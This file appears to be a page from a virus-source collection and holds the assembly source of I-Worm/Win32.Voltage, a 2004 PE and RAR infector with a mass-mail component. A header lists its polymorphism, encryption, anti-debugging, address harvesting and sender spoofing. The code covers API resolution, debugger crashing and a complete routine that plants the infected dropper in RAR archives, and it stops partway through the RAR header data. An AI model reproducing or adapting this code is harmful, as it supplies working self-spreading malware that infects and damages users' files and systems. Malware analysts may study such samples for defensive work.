i-worm_win32.voltage病毒源代码.txt

I-Worm_Win32.Voltage病毒源代码

; I-Worm\Win32.Voltage by DR-EF (c) 2004,Version 2.2
; --------------------------------------------------
; 
; Virus Name:Win32.Voltage
; Virus Size:22k
; Type:PE\RAR Infector\Mail worm
; Author:DR-EF
;
; Virus Features:
; ---------------
; - use the registry shell spawning technice to infect exe files
; 　when they executed
; - encrypted by 2 layers
; - use EPO
; - polymorphic engine can generate diffrent instructions for the
; 　same action,mixed with junk code + using SEH to jump to host
; - infect rar files by adding infected file\dropper
; - anti debugging features
; 
; Mail Worm Features:
; -------------------
; - 5 messages,subjects,filenames
; - SMTP engine + base64 encoder
; - collect mails from WAB & temporary internet files
; - spoof mailfrom
;
; Fixed Bugs From Old Versions:
; -----------------------------
; - search kernel base with SEH walker instead of last stack method
; - dont set code flag at last section,only read/write
; - fixed bug with image size of infected files
; - removed 1 section in the dropper (wvltg.exe)
; - replaced the CheckFileName function


.386
.model flat

extrn MessageBoxA:proc

DEBUG equ 0 ;switch debug version on\off
VirusSize equ (VirusEnd-_main)
EncryptedVirus equ (EncryptedVirusEnd-(_main+EncryptionStart))

.data
db ?

.code

_main: 
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,0ch ;restore stack
call DecryptVirus
EncryptionStart equ ($-_main)
mov esp,[esp + 8h] ;restore stack
pop dword ptr fs:[0]
add esp,4h
VirusStart equ $
call Delta
Delta: pop ebp
sub ebp,offset Delta
call FindKernel
jmp SearchGetProcAddress

Wvltg_EntryPoint:
call Delta_ ;get delta offset
Delta_: pop ebp
sub ebp,offset Delta_
lea eax,[ebp + Exit_V]
push eax
pushad
jmp VirusStart


FindKernel: ;find kernel using SEH walker
　　　　mov eax,fs:[0]
search_last:
　　　　mov edx,[eax]
　　　　inc edx
　　　　jz found_last
　　　　dec edx
　　　　xchg edx,eax
　　　　jmp search_last
found_last:
　　　　mov eax,[eax+4]
　　　　and eax,0ffff0000h
search_mz:
　　　　cmp word ptr [eax],"ZM"
　　　　jz found_mz
　　　　sub eax,10000h
　　　　jmp search_mz
found_mz:
mov [ebp + kernel32base],eax
ret

kernel32base dd 0
_GetProcAddress db "GetProcAddress",0
__GetProcAddress dd 0
ApiNamesTable:

_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_GetCommandLine db "GetCommandLineA",0
_CreateProcess db "CreateProcessA",0
_LoadLibrary db "LoadLibraryA",0
_FreeLibrary db "FreeLibrary",0
GetSystemDirectoryA db "GetSystemDirectoryA",0
lstrcatA db "lstrcatA",0
_GetModuleFileName db "GetModuleFileNameA",0
_SetFileAttributesA db "SetFileAttributesA",0
_GetStartupInfoA db "GetStartupInfoA",0
_GetFileSize db "GetFileSize",0
_SetFilePointer db "SetFilePointer",0
_SetEndOfFile db "SetEndOfFile",0
_GetTickCount db "GetTickCount",0
_GlobalAlloc db "GlobalAlloc",0
_GlobalFree db "GlobalFree",0
_GetLocalTime db "GetLocalTime",0
_GetFileAttributes db "GetFileAttributesA",0
_GetFileTime db "GetFileTime",0
_SetFileTime db "SetFileTime",0
_DeleteFile db "DeleteFileA",0
_CreateMutexA db "CreateMutexA",0
_OpenMutexA db "OpenMutexA",0
_FindFirstFileA db "FindFirstFileA",0
_FindNextFileA db "FindNextFileA",0
_SetCurrentDirectoryA db "SetCurrentDirectoryA",0
_WriteFile db "WriteFile",0
_FindClose db "FindClose",0
_MultiByteToWideChar db "MultiByteToWideChar",0
_ExitProcess db "ExitProcess",0

ApiAddressTable:

CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnMapViewOfFile dd 0
GetCommandLine dd 0
CreateProcess dd 0
LoadLibrary dd 0
FreeLibrary dd 0
GetSystemDirectory dd 0
lstrcat dd 0
GetModuleFileName dd 0
SetFileAttributes dd 0
GetStartupInfo dd 0
GetFileSize dd 0
SetFilePointer dd 0
SetEndOfFile dd 0
GetTickCount dd 0
GlobalAlloc dd 0
GlobalFree dd 0
GetLocalTime dd 0
GetFileAttributes dd 0
GetFileTime dd 0
SetFileTime dd 0
DeleteFile dd 0
CreateMutex dd 0
OpenMutex dd 0
FindFirstFile dd 0
FindNextFile dd 0
SetCurrentDirectory dd 0
WriteFile dd 0
FindClose dd 0
MultiByteToWideChar dd 0
ExitProcess dd 0

NumberOfApis equ 34


SearchGetProcAddress:
mov eax,[ebp + kernel32base]
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[ebp + kernel32base]
;eax - kernel32 export table
push eax
xor edx,edx
mov eax,[eax + 20h]
add eax,[ebp + kernel32base]
mov edi,[eax]
add edi,[ebp + kernel32base]
;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax
;eax - kernel32 export table
;edx - GetProcAddress position
shl edx,1h
mov ebx,[eax + 24h]
add ebx,[ebp + kernel32base]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[ebp + kernel32base]
add ebx,edx
mov ebx,[ebx]
add ebx,[ebp + kernel32base]
mov [ebp + __GetProcAddress],ebx
mov ecx,NumberOfApis
lea eax,[ebp + ApiNamesTable]
lea ebx,[ebp + ApiAddressTable]
mov edx,[ebp + kernel32base]
call get_apis
jc Do_Virus_Actions
jmp ReturnToHost
Do_Virus_Actions:
pushad
lea eax,[ebp + AntiDebug]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
mov [eax],ebx ;force debugger to jump
AntiDebug:
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
call CrashDebuggers ;now if we under debugger we simple crash
call GetADVAPI32Apis
jnc ReturnToHost
call GetUser32Apis ;used for debug and payload
jnc ReturnToHost
call AntiLamers
call HideVirus
call ProcessCommandLine
cmp byte ptr [ebp + RunFromExeHooker],1h ;we run from virus exe hooker ?
je ExecuteAndInfectFile
call InstallVirus
jmp ReturnToHost
ExecuteAndInfectFile:
mov byte ptr [ebp + Infection_Success],0h
call InfectFile
call InstallVirus
call PayLoad
call ExecuteFile
call MassMail
lea eax,[ebp + FileDirectory]
call ScanDirectoryForRarFiles
ReturnToHost:
cmp byte ptr [ebp + RunFromExeHooker],1h
jne RetHost
Exit_V:
push eax ;if we running from virus exe hooker
call [ebp + ExitProcess] ;we simple exit
RetHost:popad
db 64h,0a1h,0,0,0,0 ;mov eax,fs:[00000000]
dec ebx
ret

CopyRight db "Win32.Voltage Virus Written By DR-EF (c) 2004",0
SizeOfCopyRight equ ($-CopyRight)

AntiLamers:
lea edx,[ebp + CopyRight] ;)
mov ecx,SizeOfCopyRight 
xor eax,eax 
call xcrc32 
cmp eax,0C3F9A421h 
je NoRip 
xor esp,esp 
NoRip: ret 


GetUser32Apis:
lea eax,[ebp + User32dll]
push eax
call [ebp + LoadLibrary]
xchg eax,edx
mov ecx,NumberOfUser32Functions
lea eax,[ebp + user32_functions_sz]
lea ebx,[ebp + user32_functions_addresses]
call get_apis
ret

User32dll db "User32.dll",0
user32_functions_sz:

_MessageBox db "MessageBoxA",0
_SetWindowTextA db "SetWindowTextA",0

user32_functions_addresses:

MessageBox dd 0
SetWindowText dd 0

NumberOfUser32Functions equ 2


CrashDebuggers: 
lea eax,[ebp + _IsDebuggerPresent]
push eax
push [ebp + kernel32base]
call [ebp + __GetProcAddress]
cmp eax,0h
je NoIDP
call eax
cmp eax,0h
je NoIDP
xor esp,esp ;hang debuggers
NoIDP: ret

_IsDebuggerPresent db "IsDebuggerPresent",0


;eax - pointer to directory name:
ScanDirectoryForRarFiles:
push eax
call [ebp + SetCurrentDirectory]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + RarFiles]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
mov [ebp + hfind],eax ;save search handle
@rar: call InfectRar
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @rar
ExitRarScan:
ret

RarFiles db "*.rar",0

;rar archive infection procedure:
;tested with rar archive"s that created using winrar v3.20
InfectRar:
call InitRandomNumber
cmp [ebp + nFileSizeLow],300000h
ja ExitRarInfection ;do not infect files that are bigger than 3mb
cmp byte ptr [ebp + Infection_Success],0h
je usewvltg
xor ecx,ecx
lea esi,[ebp + FileToInfect]
GetLen: cmp byte ptr [esi],0h
je CopyPth
inc ecx
inc esi
jmp GetLen
CopyPth:inc ecx
lea esi,[ebp + FileToInfect]
lea edi,[ebp + InfectedDropper] ;use infected file
rep movsb
jmp OpenDropper
usewvltg: 
push 0ffh
lea eax,[ebp + InfectedDropper]
push eax
push 0h
call [ebp + GetModuleFileName] ;use virus dropper
cmp eax,0h
je ExitRarInfection
OpenDropper: 
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + InfectedDropper]
push eax
call [ebp + CreateFile] ;open the infected dropper
cmp eax,INVALID_HANDLE_VALUE
je ExitRarInfection
mov [ebp + hInfectedDropper],eax
push 0h
push eax
call [ebp + GetFileSize] ;get dropper file size
cmp eax,0ffffffffh
je ExitAndCloseDropperFile
mov [ebp + DropperSize],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push dword ptr [ebp + hInfectedDropper]
call [ebp + CreateFileMapping] ;create file mapping object for the dropper
cmp eax,0h
je ExitAndCloseDropperFile
mov [ebp + hDropperMap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push dword ptr [ebp + hDropperMap]
call [ebp + MapViewOfFile] ;map dropper into memory
cmp eax,0h
je ExitAndCloseDropperMap
mov [ebp + DropperMap],eax
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ or GENERIC_WRITE
lea eax,[ebp + cFileName]
push eax
call [ebp + CreateFile] ;open rar file
cmp eax,INVALID_HANDLE_VALUE
je ExitAndUnMapDropper
mov [ebp + hRarFile],eax
xor eax,eax
push eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hRarFile]
call [ebp + CreateFileMapping] ;create file mapping object of the rar file
cmp eax,0h
je ExitAndCloseRarFile
mov [ebp + hRarMap],eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hRarMap]
call [ebp + MapViewOfFile]
cmp eax,0h
je ExitAndCloseRarMap
mov [ebp + RarMap],eax
cmp dword ptr [eax],"!raR" ;is rar file ?
jne RarFileInfectionErr
cmp byte ptr [eax + 0fh],1h ;is already infected ?
je RarFileInfectionErr
xor eax,eax
mov edx,[ebp + DropperMap]
mov ecx,[ebp + DropperSize]
call xcrc32 ;get infected dropper crc32 checksum
mov dword ptr [ebp + FILE_CRC],eax ;set it insaid rar header
mov eax,dword ptr [ebp + ftCreationTime + 4]
mov dword ptr [ebp + FTIME],eax ;set random time\data
pushad
mov ecx,6h
lea edi,[ebp + FileInsaidRar]
@RandLetter: 
call GenRandomNumber
and al,19h
add al,61h
stosb
loop @RandLetter ;gen random name for the infected dropper
popad
mov eax,[ebp + DropperSize]
mov [ebp + PACK_SIZE],eax
mov [ebp + UNP_SIZE],eax ;set dropper size insaid of rar header
xor eax,eax
lea edx,[ebp + headcrc]
mov ecx,(EndRarHeader-RarHeader-2)
call xcrc32 ;get crc32 checksum of the rar header
mov word ptr [ebp + HEAD_CRC],ax ;and set it in rar header
lea esi,[ebp + RarHeader]
mov edi,[ebp + RarMap]
add edi,[ebp + nFileSizeLow]
sub edi,7h ;overwrite rar file sign
push edi
mov ecx,RarHeaderSize
rep movsb ;write the rar header into rar file
mov esi,[ebp + DropperMap]
pop edi
add edi,RarHeaderSize
mov ecx,[ebp + DropperSize]
rep movsb ;write the infected dropper into rar file
mov eax,[ebp + RarMap]
push eax
inc byte ptr [eax + 0fh] ;mark the rar file as infected(0fh=reserved1)
mov edx,eax
xor eax,eax
add edx,9h
mov ecx,0bh
call xcrc32 ;get crc32 of the rar main header
pop ebx
mov word ptr [ebx + 7h],ax ;[ebx + 7h]=HEAD_CRC
ExitAndUnMapRarFile:
push [ebp + RarMap]
call [ebp + UnMapViewOfFile]
ExitAndCloseRarMap:
push dword ptr [ebp + hRarMap]
call [ebp + CloseHandle]
ExitAndCloseRarFile:
push dword ptr [ebp + hRarFile]
call [ebp + CloseHandle]
ExitAndUnMapDropper:
push dword ptr [ebp + DropperMap] 
call [ebp + UnMapViewOfFile]
ExitAndCloseDropperMap:
push dword ptr [ebp + hDropperMap]
call [ebp + CloseHandle]
ExitAndCloseDropperFile:
push dword ptr [ebp + hInfectedDropper]
call [ebp + CloseHandle]
ExitRarInfection:
ret
RarFileInfectionErr:
push FILE_BEGIN
push 0h
push dword ptr [ebp + nFileSizeLow]
push dword ptr [ebp + hRarFile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hRarFile]
call [ebp + SetEndOfFile]
jmp ExitAndUnMapRarFile


InfectedDropper db 0ffh dup(0)
hInfectedDropper dd 0
DropperSize dd 0
hDropperMap dd 0
DropperMap dd 0
hRarFile dd 0
hRarMap dd 0
RarMap dd 0



RarHeader:
HEAD_CRC dw 0h
headcrc:HEAD_TYPE db 74h
HEAD_FLAGS dw 8000h ;normal flag
HEAD_SIZE dw RarHeaderSize
PACK_SIZE dd 0h
UNP_SIZE dd 0h
HOST_OS db 0h ;Ms-Dos
FILE_CRC dd 0h
FTIME dd 0h
UNP_VER db 14h
METHOD db 30h ;storing
NAME_SIZE dw 0ah ;file name size
endhcrc:ATTR dd 0h
FileInsaidRar equ $
FILE_NAME db "ReadMe.exe"